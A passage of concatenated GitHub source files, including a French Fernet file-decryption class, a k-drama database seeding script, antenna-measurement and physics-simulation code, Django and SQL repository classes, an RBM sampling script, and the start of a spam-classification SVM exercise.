AlgoG\n\n\nclass DecrypterUnFichier:\n '''cette classe permet de charger une clé de cryptage pour effectuer le décryptage d'un fichier.\n NB: Il faut que le fichier ait été crypté après avoir été ouvert et lu en mode 'rb' et que l'ouverture au moment\n du décryptage se fasse également en mode 'rb'. Tout cela est géré au niveau de la classe File() mais des erreurs\n Fernet peuvent se produire inexplicablement si ces étapes là ne sont pas bien suivies. '''\n\n def __init__(self):\n self.app_path = \"\"\n self.choixFichier = None\n self.key = None\n self.decryptedFile = None\n self.name = \"\"\n self.newname = \"\"\n self.path = \"\"\n self.algo = None\n self.initVariables()\n # self.file = File # on n'a pas forcément besoin d'instancier le fichier à decrypter avec notre classe si les\n # manipulations sur les chemins de fichier suffisent mais peut-être le faudra-t-il si on implémente File\n # dans les fonctions de cryptage de _01_AlgoG\n\n def initVariables(self):\n '''(re)initialisation des variables de la Classe et instanciation de ChoixFichier()\n NB: il est nécessaire de découpler initFichier de initCryptage car on veut pouvoir\n réinitialiser les variables à chaque fois avant de commencer l'opération, autrement les variables restent\n en mémoire et interfèrent avec l'opération de cryptage suivante'''\n self.app_path = Path(os.path.dirname(os.path.abspath(\"__00__IA.py\")))\n self.choixFichier = ChoixFichier()\n self.choixFichier.question = 'Choisissez un fichier à décrypter:'\n self.decryptedFile = File\n self.name = \"\"\n self.newname = \"\"\n self.path = \"\"\n self.algo = AlgoG()\n\n def initKey(self):\n \"\"\"Ici on appelle inévitablement un sous-module qui permet de charger la clé de cryptage\n Attention : on ne veut pas initialiser cette variable en même temps que l'instanciation de la classe, mais\n seulement au moment ou l'on appelle la méthode crypter sur un objet de la classe.\"\"\"\n getkey = ChargerUneClef().choiceKey()\n self.key = getkey\n self.key.__setattr__('key', getkey.key)\n return getkey\n\n def initFichier(self):\n \"\"\"Initialisation du fichier à décrypter : commence par une boucle de choix pour la sélection du fichier puis\n fixe les valeurs des variables de la class qui serviront en argument de la fonction decrypter(). Il faut\n lancer initFichier avant chaque opération de décryptage si la classe n'est pas réinstancié entre deux\n utilisation de decrypter()\"\"\"\n choixUtilisateur = self.choixFichier.validerExistence()\n if choixUtilisateur:\n path = self.choixFichier.pathFichier()\n name = path.name\n self.__setattr__('path', path)\n self.__setattr__('name', name)\n # file = File(self.path) # cf. commentaire de l'attribut self.file pour l'instant on n'en a pas besoin\n # self.__setattr__('file',file)\n return True\n else:\n return False\n\n def initDecryptage(self):\n \"\"\"Pour optimiser le lancement de ces deux opérations en une seule. Quand l'utilisateur lance une session il\n peut avoir à effectuer plusieurs fois l'opération de decryptage d'un fichier.\n Ce sont donc deux opérations qui doivent nécessairement précéder tout lancement d'un décryptage.\n Cela évite de réinstancier la classe entre chaque nouveau décryptage.\n Celle-ci est instanciée une fois pour toute au début du programme, mais au cours d'une même\n session les variables doivent être constamment mises à jour pour que l'application ne reste pas bloquer sur\n les mêmes paramètres utilisateurs donnés à la première opération de décryptage.\"\"\"\n self.initVariables() # après le chargement de la clé on initialise toute la séquence de sélection du fichier\n # à décrypter\n self.initFichier() # attention il faut initialiser le fichier à dércypter ici, autrement la fonction suivante\n # prend en argument les variables d'un fichier décrypté précédemment,\n # car la class où nous sommes est instanciée une première fois dans le module _00_IA().py et reste active\n # après chaque opération de décryptage.\n\n def renameDecryptedFiles(self,prefix=\"crypt_\"):\n self.newname = self.algo.renameDecryptFiles(self.name, prefix)\n return self.newname\n\n def decrypter(self,init_KEY=True):\n \"\"\"Décryptage proprement dit et fin de la boucle du module\n la variable init_KEY permet au besoin d'effectuer plusieurs cryptages de fichier à la suite avec la même clé,\n ce sera utile lorsque l'on voudra crypter un dossier en passant par CryptFichier\"\"\"\n if init_KEY: # on n'a pas toujours besoin de demander une clé si celle-ci à déjà été chargée une fois\n self.initKey()\n self.initDecryptage()\n print(self.key.key, self.name, self.path.parent)\n input(\"enter si c'est la bonne clé\")\n self.algo.decryptOneFileAndRemove(self.name, self.path.parent, self.key.key)\n os.chdir(self.app_path)\n print(f\"retour au dossier d'origine: {self.key.path.parent}\")\n print(\"Décryptage réussi!\\nRetour au Menu Principal\")\n time.sleep(1) # pour permettre de lire le message et de réaliser à quel point on est très fort.\n return 'Menu'\n\n\nif __name__ == \"__main__\":\n key = Key()\n print(key.key.encode())\n k = Fernet.generate_key()\n f = Fernet(key.key)\n c = f.encrypt('test'.encode())\n\n #c = file.getContent()\n #file.closeFile()\n print(c)\n d = f.decrypt(c)\n print(d)","repo_name":"DevprojectEkla/CryptOO","sub_path":"_05_DecrypterUnFichier.py","file_name":"_05_DecrypterUnFichier.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26190398350","text":"\"\"\"Seed the database\"\"\"\nimport os\nimport json\nfrom random import choice, randint\nfrom datetime import datetime\nimport crud, model, server\nimport requests\n\nos.system('dropdb kdrama-review-db')\nos.system('createdb kdrama-review-db')\n\nmodel.connect_to_db(server.app)\nmodel.db.create_all()\n\ndef add_kdramas(kdrama_list):\n '''Given a list of kdrama dictionary items, extract\n data and store db using crud'''\n for kdrama in kdrama_list:\n title, overview, poster_path, backdrop_path, kdrama_id = (\n kdrama[\"name\"],\n kdrama[\"overview\"],\n kdrama[\"poster_path\"],\n kdrama['backdrop_path'],\n kdrama['id'], \n )\n release_date = kdrama.get(\"first_air_date\", None)\n if not release_date: release_date = None\n if release_date:\n release_date = datetime.strptime(release_date, \"%Y-%m-%d\")\n try:\n crud.create_kdrama(kdrama_id, title, overview, release_date, poster_path, backdrop_path)\n except:\n print(f'problem with INSERT for {kdrama_id}: {title}')\n\n\nurl = 'https://api.themoviedb.org/3/discover/tv'\npayload = {'api_key': os.environ['TMDB_API_KEY'],\n 'language': 'en-US',\n 'sort_by': 'first_air_date.desc',\n 'with_original_language': 'ko', # narrows search to only korean dramas\n}\n\n'''Get the first page of kdrama results and store total pages'''\nres = requests.get(url, params=payload)\ndata = res.json()\npages = data['total_pages']\n\n'''Stores kdrama data from all pages into database'''\nfor page in range(1, pages): \n payload['page'] = page\n res = requests.get(url, params=payload)\n data = res.json()\n results = data.get('results')\n if results: \n add_kdramas(results)\n print(f'---------- {page} --------------')\n else:\n print(f'---------- Skipped {page} --------------')\n\n\n''' Creates 10 test users '''\n\nGENRES = { \"16\": \"Animation\",\n \"18\": \"Drama\",\n \"35\": \"Comedy\",\n \"37\": \"Western\",\n \"80\": \"Crime\",\n \"99\": \"Documentary\",\n \"9648\": \"Mystery\",\n \"10751\": \"Family\",\n \"10759\": \"Action & Adventure\",\n \"10762\": \"Kids\",\n \"10763\": \"News\",\n \"10764\": \"Reality\",\n \"10765\": \"Sci-Fi & Fantasy\",\n \"10766\": \"Soap\",\n \"10767\": \"Talk\",\n \"10768\": \"War & Politics\"\n}\n\nfor n in range(10):\n fname = f'User{n+1}'\n lname = 'Tester'\n email = f'user{n+1}@test.com' \n password = 'test'\n username = f'user{n+1}'\n image_path = f'/static/img/avatars/{randint(1,14)}.png'\n fav_genre= choice(list(GENRES))\n new_user = crud.create_user(fname, lname, email, password, username, image_path, fav_genre)\n","repo_name":"grandeD/kdrama-review-app","sub_path":"seed_database.py","file_name":"seed_database.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42029919904","text":"'''\nCreated on May 17, 2016\n\n@author: carlos\n'''\n\nclass DataFile(object):\n '''\n classdocs\n '''\n \n def readAscii(self,freq,N_th,N_ph): \n import numpy as np\n \n import linecache\n \n #use this lines to check if the file is in the folder\n \n '''import os.path\n print(os.listdir(os.getcwd()))\n print(self.filename + '.txt')\n print(os.path.isfile(self.filename + '.txt'))'''\n \n data = []\n for n in range(N_th*N_ph):\n # the \"+2\" is used to skip the two first lines of the text file\n kk = linecache.getline(self.filename + '.txt', \\\n 3+n+(freq-1)*N_th*N_ph)\n kk = kk.split()\n kk = [np.float(kk[n]) for n in range(len(kk))]\n data = np.append(data, kk, axis=0)\n \n data = np.reshape(data, [N_th*N_ph,8]) \n # print(data[N_th*N_ph-1,0:4]) \n self.data = data\n \n def calc_F(self,freq,N_th,N_ph):\n import numpy as np\n \n # reads the data measured at each frequency\n \n self.readAscii(freq,N_th,N_ph)\n \n self.Freq = self.data[0,0]/1e9\n \n self.theta = []\n self.phi = []\n self.E_phi = []\n self.E_the = []\n self.Gain = []\n \n self.theta = np.array([self.data[n,2] \\\n for n in range(N_th*N_ph)])\n \n mask = self.data[:,2] < 0\n \n \n \n self.phi = np.array([self.data[n,1] \\\n for n in range(N_th*N_ph)])\n \n \n # I change angles from theta -180 to 180 ohi 0 to 180\n # to theta 0 to 180 and phi 0 to 2pi\n # I did this because the integrals where not performed good\n # do not ask me why!\n \n np.copyto(self.phi, np.pi+self.phi, where=mask)\n np.copyto(self.theta, np.abs(self.theta), where=mask)\n \n \n \n self.E_phi = np.array([[self.data[n,3]+1j*self.data[n,4] ] \\\n for n in range(N_th*N_ph)])\n \n self.E_the = np.array([[self.data[n,5]+1j*self.data[n,6] ] \\\n for n in range(N_th*N_ph)])\n \n self.Gain = np.array([[self.data[n,7] ] \\\n for n in range(N_th*N_ph)])\n \n \n \n # use this below to test integrals. \n # Be aware that Gain is converted to linear\n # before integration. UnComment line 22 in Calculations\n \n #self.Gain = np.array([[self.data[n,7] ] \\\n # for n in range(N_th*N_ph)])\n\n def write_CST_like(self,work_folder,data,N_antennas,filename):\n\n text_file = open(work_folder + filename, 'w')\n \n for m in range(N_antennas):\n text_file.write('port' + str(m+1)+ '\\n')\n text_file.write('------------------------------------------------'+ '\\n')\n \n for n in range(data.shape[0]):\n text_file.write(str(data[n,m,0]) +'\\t'+ str(data[n,m,1]) + '\\n')\n text_file.write('\\n')\n text_file.close()\n \n def writes_RadPat(self,work_folder,filename):\n \n import numpy as np\n \n text_file = open(work_folder + filename, 'w')\n \n text_file.write('Theta [deg.] Phi [deg.] Abs(Grlz)[dB]' \\\n + 'Abs(Theta)[dB] Phase(Theta)[deg.] Abs(Phi)[dB] Phase(Phi)[deg.]' +\\\n 'Ax.Ratio[dB] \\n')\n \n print('not all the info is printed')\n \n text_file.write('------------------------------------------------\\n')\n \n for n in range(self.Nphi*self.Ntheta):\n text_file.write(str(np.around(self.theta[n]*180/np.pi, decimals = 2 ))+ '\\t' + \\\n str(np.around(self.phi[n]*180/np.pi, decimals = 2 ))+ '\\t' + \\\n str(np.around(self.Gain[n], decimals = 4 ))[1:-1] + '\\t' + \\\n '0.0000' + '\\t' + '0.0000' + '\\t' + '0.0000' + '\\t' + '0.0000' + '\\t' + \\\n '0.0000' + '\\n')\n\n text_file.close() \n def decimate(self,N_th,N_ph):\n '''\n The data comes from the satimo each 2.5degrees\n I create dummy vectors of same size than the ones coming\n from satimo. Then take only the ones multiple of 15deg\n \n the dummy vectors are created as the come from satimo,\n this is theta -180 to 180 and phi from 0 to 180.\n \n '''\n import numpy as np\n \n \n \n theta = np.array([-180.0+m*360.0/(N_th-1) \\\n for n in range(N_ph)\n for m in range(N_th) ])\n\n phi = np.array([n*180.0/(N_ph) \\\n for n in range(N_ph)\n for m in range(N_th) ])\n \n mask1 = np.mod(theta,15) == 0\n \n self.theta = self.theta[mask1]\n self.phi = self.phi[mask1]\n self.E_phi = self.E_phi[mask1]\n self.E_the = self.E_the[mask1]\n self.Gain = self.Gain[mask1]\n \n theta = theta[mask1]\n phi = phi[mask1]\n \n mask2 = np.mod(phi,15) == 0 \n \n self.theta = self.theta[mask2]\n self.phi = self.phi[mask2]\n self.E_phi = self.E_phi[mask2]\n self.E_the = self.E_the[mask2]\n self.Gain = self.Gain[mask2]\n self.Ntheta = 25\n self.Nphi = 12\n \n def __init__(self, filename, Ntheta, Nphi):\n '''\n Constructor\n '''\n self.filename = filename\n self.Ntheta = Ntheta\n self.Nphi = Nphi\n ","repo_name":"kai-lu/Satimo-Data-Processing","sub_path":"Satimo/FileManagment.py","file_name":"FileManagment.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"18713626780","text":"import json\nimport re\nfrom to_suburb import search\n\n\ndef getp(data):\n latitude = data[\"key\"][\"coordinates\"][1]\n longitude = data[\"key\"][\"coordinates\"][0]\n tup = search(latitude, longitude)\n if tup is not None:\n data[\"postcode\"] = tup[1]\n else:\n data[\"postcode\"] = \"error\"\n return data\n\n\nwith open(\"coordinates.json\") as f1:\n fl = f1.readline()\n\nwith open(\"twt_postcode.json\",\"w\") as myfile:\n #myfile.write(\"{\\\"total_rows\\\":62002,\\\"offset\\\":0,\\\"rows\\\":[\\n\")\n myfile.write(fl) \nmydata = json.load(open('coordinates.json'))\ncdlist = mydata[\"rows\"]\n\nresult = map(getp, cdlist)\n\n#print (result)\nwith open(\"twt_postcode.json\",\"a\") as myfile2:\n for j in result:\n if j[\"postcode\"] != \"error\": \n myin = \"{k},\\n\".format(k=json.dumps(j))\n myfile2.write(myin)\n\nwith open(\"twt_postcode.json\",\"a\") as myfile:\n myfile.write(\"{\\\"value\\\": \\\"Puput\\\",\\\"address\\\": \\\"217-223 Grattan St, Carlton VIC 3053, Australia\\\", \\\"key\\\": {\\\"coordinates\\\": [144.9612697, -37.8001786], \\\"type\\\": \\\"Point\\\"}, \\\"postcode\\\": \\\"3053\\\", \\\"id\\\": \\\"990850686521757697\\\"}\\n]}\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"qingyangli95/guess_what","sub_path":"gcm.py","file_name":"gcm.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3026157416","text":"from minieigen import *\nfrom woo.dem import *\nimport woo.core, woo.models\nfrom math import *\nimport numpy\n\n\nclass PourFeliciter(woo.core.Preprocessor,woo.pyderived.PyWooObject):\n\t'''Showcase for custom packing predicates, and importing surfaces from STL.'''\n\t_classTraits=None\n\t_PAT=woo.pyderived.PyAttrTrait # less typing\n\t_attrTraits=[\n\t]\n\tdef __init__(self,**kw):\n\t\twoo.core.Preprocessor.__init__(self)\n\t\tself.wooPyInit(self.__class__,woo.core.Preprocessor,**kw)\n\tdef __call__(self):\n\t\t# preprocessor builds the simulation when called\n\t\tpass\n\nclass NewtonsCradle(woo.core.Preprocessor,woo.pyderived.PyWooObject):\n\t'''Showcase for custom packing predicates, and importing surfaces from STL.'''\n\t_classTraits=None\n\t_PAT=woo.pyderived.PyAttrTrait # less typing\n\t_attrTraits=[\n\t\t_PAT(int,'nSpheres',5,'Total number of spheres'),\n\t\t_PAT(int,'nFall',1,'The number of spheres which are out of the equilibrium position at the beginning.'),\n\t\t_PAT(float,'fallAngle',pi/4.,unit='deg',doc='Initial angle of falling spheres.'),\n\t\t_PAT(float,'rad',.005,unit='m',doc='Radius of spheres'),\n\t\t_PAT(Vector2,'cabHtWd',(.1,.1),unit='m',doc='Height and width of the suspension'),\n\t\t_PAT(float,'cabRad',.0005,unit='m',doc='Radius of the suspending cables'),\n\t\t_PAT(woo.models.ContactModelSelector,'model',woo.models.ContactModelSelector(name='Hertz',restitution=.99,numMat=(1,2),matDesc=['spheres','cables'],mats=[FrictMat(density=3e3,young=2e8),FrictMat(density=.001,young=2e8)]),doc='Select contact model. The first material is for spheres; the second, optional, material, is for the suspension cables.'),\n\t\t_PAT(Vector3,'gravity',(0,0,-9.81),'Gravity acceleration'),\n\t\t_PAT(int,'plotEvery',10,'How often to collect plot data'),\n\t\t_PAT(float,'dtSafety',.7,':obj:`woo.core.Scene.dtSafety`')\n\t]\n\tdef __init__(self,**kw):\n\t\twoo.core.Preprocessor.__init__(self)\n\t\tself.wooPyInit(self.__class__,woo.core.Preprocessor,**kw)\n\tdef __call__(self):\n\t\tpre=self\n\t\tS=woo.core.Scene(fields=[DemField(gravity=pre.gravity)],dtSafety=self.dtSafety)\n\t\tS.pre=pre.deepcopy()\n\n\t\t# preprocessor builds the simulation when called\n\t\txx=numpy.linspace(0,(pre.nSpheres-1)*2*pre.rad,num=pre.nSpheres)\n\t\tmat=pre.model.mats[0]\n\t\tcabMat=(pre.model.mats[1] if len(pre.model.mats)>1 else mat)\n\t\tht=pre.cabHtWd[0]\n\t\tfor i,x in enumerate(xx):\n\t\t\tcolor=min(.999,(x/xx[-1]))\n\t\t\ts=Sphere.make((x,0,0) if i>=pre.nFall else (x-ht*sin(pre.fallAngle),0,ht-ht*cos(pre.fallAngle)),radius=pre.rad,mat=mat,color=color)\n\t\t\tn=s.shape.nodes[0]\n\t\t\tS.dem.par.add(s)\n\t\t\t# sphere's node is integrated\n\t\t\tS.dem.nodesAppend(n)\n\t\t\tfor p in [Vector3(x,-pre.cabHtWd[1]/2,pre.cabHtWd[0]),Vector3(x,pre.cabHtWd[1]/2,pre.cabHtWd[0])]:\n\t\t\t\tt=Truss.make([n,p],radius=pre.cabRad,wire=False,color=color,mat=cabMat,fixed=None)\n\t\t\t\tt.shape.nodes[1].blocked='xyzXYZ'\n\t\t\t\tS.dem.par.add(t)\n\t\tS.engines=DemField.minimalEngines(model=pre.model,dynDtPeriod=20)+[\n\t\t\tIntraForce([In2_Truss_ElastMat()]),\n\t\t\t\twoo.core.PyRunner(self.plotEvery,'S.plot.addData(i=S.step,t=S.time,total=S.energy.total(),relErr=(S.energy.relErr() if S.step>1000 else 0),**S.energy)'),\n\t\t\t]\n\t\tS.lab.dynDt.maxRelInc=1e-6\n\t\tS.trackEnergy=True\n\t\tS.plot.plots={'i':('total','**S.energy')}\n\n\t\treturn S\n\n\n\n","repo_name":"Azeko2xo/woodem","sub_path":"py/pre/toys.py","file_name":"toys.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"17606681025","text":"from typing import Optional, List, Union\nfrom queries.pool import pool\nfrom models.models import Error, RoomIn, RoomOut\n\n\nclass RoomRepository:\n def get_all_rooms(self) -> Union[List[RoomOut], Error]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n SELECT id, name, description, picture_url, username\n FROM rooms\n ORDER BY id;\n \"\"\"\n )\n result = []\n for record in db:\n room = RoomOut(\n id=record[0],\n name=record[1],\n description=record[2],\n picture_url=record[3],\n username=record[4],\n )\n result.append(room)\n return result\n\n def get_one_room(self, room_id: int) -> Optional[RoomOut]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n SELECT id, name, description, picture_url, username\n FROM rooms\n WHERE id = %s;\n \"\"\",\n [room_id],\n )\n record = result.fetchone()\n if record is None:\n return None\n return self.record_to_room_out(record)\n\n def get_current_user_rooms(\n self, username: str\n ) -> Union[List[RoomOut], Error]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n SELECT id, name, description, picture_url, username\n FROM rooms\n WHERE username = %s;\n \"\"\",\n [username],\n )\n records = db.fetchall()\n if not records:\n return []\n rooms = []\n for record in records:\n rooms.append(self.record_to_room_out(record))\n return rooms\n\n def create(self, room: RoomIn) -> RoomOut:\n with pool.connection() as conn:\n with conn.cursor() as db:\n result = db.execute(\n \"\"\"\n INSERT INTO rooms (name, description, picture_url, username)\n VALUES (%s, %s, %s, %s)\n RETURNING id;\n \"\"\",\n [\n room.name,\n room.description,\n room.picture_url,\n room.username,\n ],\n )\n id = result.fetchone()[0]\n return self.room_in_to_out(id, room)\n\n def update(self, room_id: int, room: RoomIn) -> Union[RoomOut, Error]:\n with pool.connection() as conn:\n with conn.cursor() as db:\n db.execute(\n \"\"\"\n UPDATE rooms\n SET name = %s\n , description = %s\n , picture_url = %s\n WHERE id = %s;\n \"\"\",\n [room.name, room.description, room.picture_url, room_id],\n )\n return self.room_in_to_out(room_id, room)\n\n def delete(self, room_id: int) -> bool:\n with pool.connection() as conn:\n with conn.cursor() as db:\n db.execute(\n \"\"\"\n DELETE FROM rooms\n WHERE id = %s;\n \"\"\",\n [room_id],\n )\n return True\n\n def room_in_to_out(self, id: int, room: RoomIn):\n old_data = room.dict()\n return RoomOut(id=id, **old_data)\n\n def record_to_room_out(self, record):\n return RoomOut(\n id=record[0],\n name=record[1],\n description=record[2],\n picture_url=record[3],\n username=record[4],\n )\n","repo_name":"hannaerickson/ikeya","sub_path":"design_service/queries/rooms.py","file_name":"rooms.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12880439792","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\nfrom healthApp.models.BaseModel import BaseModel\nfrom healthApp.models.Gender import Gender\n\nfrom healthApp.models.Nationality import Nationality\n\n\nclass Profile(BaseModel):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n profileImage = models.TextField(null=True, blank=True)\n mobilePhone = models.CharField(max_length=20, null=True, blank=True)\n gender = models.ForeignKey(Gender, on_delete=models.CASCADE, null=True)\n birthDate = models.DateField(null=True)\n birthYear = models.IntegerField(blank=True, null=True)\n city = models.CharField(max_length=64, blank=True, null=True)\n district = models.CharField(max_length=64, blank=True, null=True)\n notification = models.BooleanField(default=True)\n nationality = models.ForeignKey(Nationality, on_delete=models.CASCADE, null=True)\n address = models.CharField(max_length=255, null=True, blank=True)\n isSendMail = models.BooleanField(default=False)","repo_name":"furkanyalcindag/comitfy-healthNetworkAppBackend","sub_path":"healthApp/models/Profile.py","file_name":"Profile.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26247525876","text":"import functools\n\nfrom delfin.api.validation import validators\nfrom delfin.api.schemas.storage_capabilities_schema import \\\n STORAGE_CAPABILITIES_SCHEMA\nfrom delfin import exception\n\n\ndef schema(request_body_schema):\n \"\"\"Register a schema to validate request body.\n\n Registered schema will be used for validating request body just before\n API method executing.\n\n :param dict request_body_schema: a schema to validate request body.\n\n \"\"\"\n\n def add_validator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n schema_validator = validators._SchemaValidator(request_body_schema)\n schema_validator.validate(kwargs['body'])\n return func(*args, **kwargs)\n return wrapper\n\n return add_validator\n\n\ndef validate_capabilities(capabilities):\n if not capabilities:\n raise exception.StorageCapabilityNotSupported()\n\n schema_validator = validators._SchemaValidator(STORAGE_CAPABILITIES_SCHEMA)\n try:\n schema_validator.validate(capabilities)\n except exception.InvalidInput as ex:\n raise exception.InvalidStorageCapability(ex.msg)\n","repo_name":"sodafoundation/delfin","sub_path":"delfin/api/validation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"6"} +{"seq_id":"43367772566","text":"import sys\nsys.path.append('../Refactor/')\nsys.path.append('../rbm-pytorch-refactor')\n\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport pandas as pd\nimport seaborn as sns\nimport torch\nimport argparse\nimport rbm_interface\nimport rbm_pytorch\nimport ising_methods_new\nfrom torch.utils.data import DataLoader\nfrom ising_methods_new import *\nimport json\nfrom scipy.stats import norm\n\nfont = {'family' : 'normal',\n 'weight' : 'light',\n 'size' : 10}\n\nmatplotlib.rc('font', **font)\n\nsns.set(style='ticks', palette='Set2')\npalette = sns.color_palette()\nsns.set_style('white')\nsns.set_style('ticks',{\"axes.linewidth\": \".5\", \"xtick.minor.size\" : \".5\", \"ytick.minor.size\" : \".5\",\"xtick.major.size\" : \"3\", \"ytick.major.size\" : \"3\"})\nsns.set_context('paper')\n\nparse = argparse.ArgumentParser(description='Process some integers.')\nparse.add_argument('--json', dest='input_json', default='params.json', help='JSON file describing the sample parameters',\n\t\t\t\t\ttype=str)\nparse.add_argument('--cuda', dest='cuda', type=bool, default=False)\n\nargs = parse.parse_args()\n\n# Enable cuda\nif args.cuda:\n\tdtype = torch.cuda.FloatTensor\nelse:\n\tdtype = torch.FloatTensor\n\n\n\nL = 8\n\nN_spins = 64\ntemperature = 2.27\n\ntry:\n\tparameters = json.load(open(args.input_json))\nexcept IOError as e:\n\tprint(\"I/O error({0}) (json): {1}\".format(e.errno, e.strerror))\n\tsys.exit(1)\nexcept:\n\tprint(\"Unexpected error:\", sys.exc_info()[0])\n\traise\n\ndtype = torch.FloatTensor\nrbm10 = rbm_pytorch.RBM(n_vis=64, n_hid=parameters['n_hid'])\nrbm10.load_state_dict(torch.load(\"batchsizes/10/trained_rbm.pytorch.200\", map_location=lambda storage, loc: storage))\nrbm100 = rbm_pytorch.RBM(n_vis=64, n_hid=parameters['n_hid'])\nrbm100.load_state_dict(torch.load(\"batchsizes/100/trained_rbm.pytorch.200\", map_location=lambda storage, loc: storage))\nrbm1000 = rbm_pytorch.RBM(n_vis=64, n_hid=parameters['n_hid'])\nrbm1000.load_state_dict(torch.load(\"batchsizes/1000/trained_rbm.pytorch.200\", map_location=lambda storage, loc: storage))\n\nstates10 = ising_methods_new.sample_from_rbm(rbm10, parameters, dtype)\nstates100 = ising_methods_new.sample_from_rbm(rbm100, parameters, dtype)\nstates1000 = ising_methods_new.sample_from_rbm(rbm1000, parameters, dtype)\n\nspin_states10 = convert_to_spins(states10)\nspin_states100 = convert_to_spins(states100)\nspin_states1000 = convert_to_spins(states1000)\n\nmag_history10 = magnetisation(spin_states10).cpu().numpy()\nenergy_history10 = ising_energy(spin_states10, L).cpu().numpy()\nmag_history100 = magnetisation(spin_states100).cpu().numpy()\nenergy_history100 = ising_energy(spin_states100, L).cpu().numpy()\nmag_history1000 = magnetisation(spin_states1000).cpu().numpy()\nenergy_history1000 = ising_energy(spin_states1000, L).cpu().numpy()\n\nsplit_mag10 = np.reshape(mag_history10, (-1,parameters['concurrent_states']))\nsplit_energy10 = np.reshape(energy_history10, (-1,parameters['concurrent_states']))\nsplit_mag100 = np.reshape(mag_history100, (-1,parameters['concurrent_states']))\nsplit_energy100 = np.reshape(energy_history100, (-1,parameters['concurrent_states']))\nsplit_mag1000 = np.reshape(mag_history1000, (-1,parameters['concurrent_states']))\nsplit_energy1000 = np.reshape(energy_history1000, (-1,parameters['concurrent_states']))\n\nsusc10 = np.var(split_mag10, axis=1)/(N_spins * temperature)\nsusc100 = np.var(split_mag100, axis=1)/(N_spins * temperature)\nsusc1000 = np.var(split_mag1000, axis=1)/(N_spins * temperature)\n\nsns.distplot(susc10, fit=norm, kde=False)\nsns.distplot(susc100, fit=norm, kde=False)\nsns.distplot(susc1000, fit=norm, kde=False)\n\nplt.show()","repo_name":"signalnoise/rbm_sampling","sub_path":"batchsizes.py","file_name":"batchsizes.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26054359600","text":"def f(s, e):\n if s < e:\n return 0\n if s == e:\n return 1\n return f(s, e + 2) * f(s, e * 3) * f(s, e * 4)\n\n\nnums = [i for i in range(100, 601) if sum(map(int, list(str(i)))) % 11 == 0]\nresult = f(1, nums[0])\nfor k in range(len(nums[1:])):\n result *= f(nums[k], nums[k + 1])\n\nprint(result)\n","repo_name":"Woolfer0097/UGE_IT","sub_path":"polyakov/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18493490517","text":"from scipy.io import loadmat\nimport numpy as np\nimport os\n\nfrom .utils import process_email, email_features, svm_train, linear_kernel, svm_predict, get_vocab_list\n\n\ndef ex6_spam():\n \"\"\"\n Exercise 6 | Spam Classification with SVMs\n\n Instructions\n ------------\n\n This file contains code that helps you get started on the\n exercise. You will need to complete the following functions:\n\n gaussian_kernel.py\n dataset3_params.py\n process_email.py\n email_features.py\n\n For this exercise, you will not need to change any code in this file,\n or any other files other than those mentioned above.\n \"\"\"\n\n \"\"\"\n ==================== Part 1: Email Preprocessing ====================\n To use an SVM to classify emails into Spam v.s. Non-Spam, you first need\n to convert each email into a vector of features. In this part, you will\n implement the preprocessing steps for each email. You should\n complete the code in processEmail.m to produce a word indices vector\n for a given email.\n \"\"\"\n\n print('\\nPreprocessing sample email (emailSample1.txt)\\n')\n\n # Extract Features\n sample1_path = os.path.dirname(os.path.realpath(__file__)) + '/data/emailSample1.txt'\n sample1_path = sample1_path.replace('\\\\', '/')\n with open(sample1_path) as fid:\n file_contents = fid.read()\n\n word_indices = process_email(file_contents)\n\n # Print stats\n print('Word Indicies: %d' % len(word_indices))\n\n input('Program paused. Press enter to continue.\\n')\n\n \"\"\"\n ==================== Part 2: Feature Extraction ====================\n Now, you will convert each email into a vector of features in R^n. \n You should complete the code in email_features.py to produce a feature\n vector for a given email.\n \"\"\"\n print('\\nExtracting features from sample email (emailSample1.txt)\\n')\n\n features = email_features(word_indices)\n\n # Print Stats\n print('\\nLength of feature vector: %d' % len(features))\n print('Number of non-zero entries: %d' % sum(features > 0))\n\n input('Program paused. Press enter to continue.\\n')\n\n \"\"\"\n =========== Part 3: Train Linear SVM for Spam Classification ========\n In this section, you will train a linear classifier to determine if an\n email is Spam or Not-Spam.\n \"\"\"\n\n # Load the Spam Email dataset\n # You will have X, y in your environment\n spam_train_path = os.path.dirname(os.path.realpath(__file__)) + '/data/spamTrain.mat'\n spam_train_path = spam_train_path.replace('\\\\', '/')\n data = loadmat(spam_train_path)\n X, y = data['X'].astype(float), data['y'][:, 0]\n\n print('Training Linear SVM (Spam Classification)')\n print('This may take 1 to 2 minutes ...\\n')\n\n C = 0.1\n model = svm_train(X, y, C, linear_kernel)\n\n # Compute the training accuracy\n p = 